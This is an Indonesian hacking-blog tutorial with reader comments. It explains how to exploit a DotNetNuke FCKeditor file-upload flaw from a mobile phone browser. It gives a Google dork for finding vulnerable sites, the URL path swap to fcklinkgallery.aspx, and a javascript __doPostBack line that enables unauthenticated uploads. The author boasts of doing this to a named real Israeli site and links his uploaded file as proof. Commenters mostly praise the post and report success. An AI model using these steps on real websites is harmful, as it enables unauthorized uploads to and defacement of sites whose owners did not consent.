Binus Hacker - Independent Hacking Community   Subscribe to BINUS HACKER Subscribe to BINUS HACKERSubscribe to BINUS HACKER FacebookSubscribe to BINUS HACKER Twitter

Hacking Website Melalui Handphone

20 September 2011
Penulis:   · Kategori Artikel: Hacking

BINUS HACKER Binus Hacker Is Not Criminal Banner

BINUS HACKER

BINUS HACKER


Hack Website Lewat HP

Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘  kata beberapa orang, Saya hanya seorang Newbie yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul.

Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan adalah system yg bekerja mendukung applikasi it sendiri (Java, SymBian, Linux, Windows, Android etc). Dan ukuran atau kapasitas serta kemampuan menampilkan web. Tapi pada dasarnya cara kerjanya tetap. Sama, jadi apa yg bisa dilakukan lwt pc,kmgknan bsa jg dikerjakan lwt hape…!

Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit
melalui hape.

Bahan2 yg kita butuhkan adalah:

1. Operamini browser versi 5.0
2. Operamini browser versi 4.2

Kenapa pake 2 Web Browser ?

Lebih enak pake 2 browser di atas.alasannya adalah:

1. Operamini 5.0 mendukung multi tab jadi cocok buat mencari target dan mengetesnya   tanpa harus open close satu2.

2. Operamini 5.0 mempunyai kemampuan copi paste,pilih text dan lgsg mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.

3. Operamini 4.2 respon browser lbh bagus dr yg v 5.0

Setelah cek target dr opmin 5.0 dan ternyata vuln tgl copy kan aja linknya di operamini 4.2 .
Tgl kta exploit lwt situ..
(Operamini 4.2 tdk multi tab,untuk yg multi tab slhkan cari di opera modif di google)

Nah sekarang memasuki langkah2 atau cara2 melakukan hack web dgn DNN exploit melalui opera mini.

Pertama: pastikan anda masih mempunyai saldo pulsa
Kedua: buka operamini v 5.0 anda dan ketik di kolom google search dorknya->

inurl:”/portals/0″  

And search!!…
Nah dapet kan??
Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di keypad hape anda.
Pilih open in new tab.
Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab.
Oh,ya untuk mengetahu gimana ,apa dan bagaimana DNN exploit it silahkan baca disini:

http://securityreason.com/exploitalert/6234

Next, misalkan kita dah dpt targetnya nih…

Example site:
http://fril.co.il/portals/0/cwindex.txt

Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn
/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  

->http://site.com/[path]/portals/0/a.txt

Menjadi
->http://site.com/[path]/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  

Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik
copas lagi.

Setelah dapet dan pasti vuln seperti site di bawah ini.

http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Copy dan pastekan di opera 4.2 kamu.
Nb:Alasannya knapa pindah browser yaitu pada opera 5.0 di hape saya kurang respon pada perintahupload. Proses upload berjalan tapi file tidak terupload dan begitu di coba di v 4.2 sukses terupload. Tapi bila di v.5.0 km bisa ya lanjut aja disitu.gak ush pndah applikasi.
Lanjut proses.!

Setelah site target di buka di opmin 4.2

Pilih : file ( select a file on your site)

Tunggu biar loading selesai dan menampilkan 2 kolom:

Kolom 1 biasanya tulisan ‘root’
Kolom 2 berisi macam2 file.
Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini:
javascript:__doPostBack(‘ctlURL $cmdUpload’,”)

Lalu klik ok….

Kolom yg tdnya berisi ‘root’ dan ‘jenis2 file’
Skrg ganti menjadi kolom ‘root’ dan kolom kosong untuk upload file.
Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km.
SUCCESS..! you cAn hacked a web site from mobile phone.

Hasilnya seperti ini http://fril.co.il/portals/0/xadal.txt < 100% lewat handphone

Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab.
-sekian-

Posted by Grey | Shinji Kagawa

Thx to all my friends
BinusHacker | wannabe hacker team| kill-9 |indonesianCoder
Visit my forum and blog.

http://www.3tnic.co.nr

BINUS HACKER Binus Hacker Chat and Forum

Komentar

72 Komentar Untuk “Hacking Website Melalui Handphone
Silahkan Berikan Tanggapan Anda Untuk Artikel Ini...

  1. Dark Elite Technology pada 6 August 2012 8:22 am

    wah ternyata ada juga cara hack lewat Handphone Keren

  2. Tips dan Trik Komputer pada 19 November 2012 10:36 pm

    wahh … makin mudah saja kita melakukan hacking , tutorialnya menjurus ke HP sekarang haha IPnya jga susah ke detect 😀

  3. Goenx Jacob Swann pada 8 January 2013 8:06 am

    Thx, it’s work
    <》_《>

  4. RazaMage pada 14 January 2013 9:41 pm

    Ijin Copas om?

  5. dnrsdn pada 17 February 2013 7:52 pm

    Mesti txt ya ? Kalo mau hack situs lain misalnya http://www.dnrsdn.com nyari portalnya gimana ? / cara hack nya gimana ? Newbie nih

  6. ranho pada 13 June 2013 12:10 am

    Mantabp

  7. Dunia Kehidupan pada 21 August 2013 4:04 pm

    wow

  8. Iqbalmobile pada 4 November 2013 8:12 pm

    Thanks bozz

  9. Tri wija pada 8 November 2013 10:57 pm

    Hahaha saya masih bingung ,yang membingungkan adalah kata” anda ! ,hehe ,

  10. Ian maz pada 21 November 2013 1:28 pm

    Kalo cuma pake opmin v4.2 nggk bisa copas gan…

  11. fatik pada 9 January 2014 1:39 am

    kata”nya hebat bgt, gw sampe gk ngerti maksudnya
    follow twitterku ya: @fatik_jozz

  12. Ch4kzz pada 17 March 2014 5:59 am

    Aman gak ? Ada yg sdh berhasil?

  13. latif pada 27 April 2014 12:04 am

    teks to binus hacker, uji coba 100% mantap, dng tabled advan t5b
    izin jln2 gan

  14. Marck pada 6 July 2014 2:14 am

    Jgn bwa israel donk

  15. Azhary pada 12 July 2014 5:53 am

    Hehehe cuman upload txt…

  16. Andi-Cyber pada 1 August 2014 10:29 am

    CooLz Semua

  17. Lee nan pada 21 September 2014 10:33 am

    ToLong kata2nya diperjeLas dong biar yg newbie cepet ngerti. . .

  18. Cara Membuat Email Melalui Hp Nokia E63 | Kumpulan Semua Info pada 1 March 2015 9:49 am

    […] Article Title: Hacking website melalui handphone – binus hacker Source: http://www.binushacker.net » Visit Link « […]

  19. Mat's pada 15 June 2015 11:28 am

    Keren gan^_^ .

  20. Ramboza pada 14 July 2015 5:15 am

    keren gan… ane coba dulu yaa….

  21. valt tracer pada 8 September 2015 9:16 pm

    Bisa di buat video tutornya gak agak bingung sama kata katanya

  22. donny pada 7 November 2015 9:46 am

    binus hacker, postingannya bagus cuman infonya kurang lengkap dan tidak bisa dianalisis. Saya mengharapkan info – info yang berguna dari anda

Silahkan Berikan Tanggapan Anda...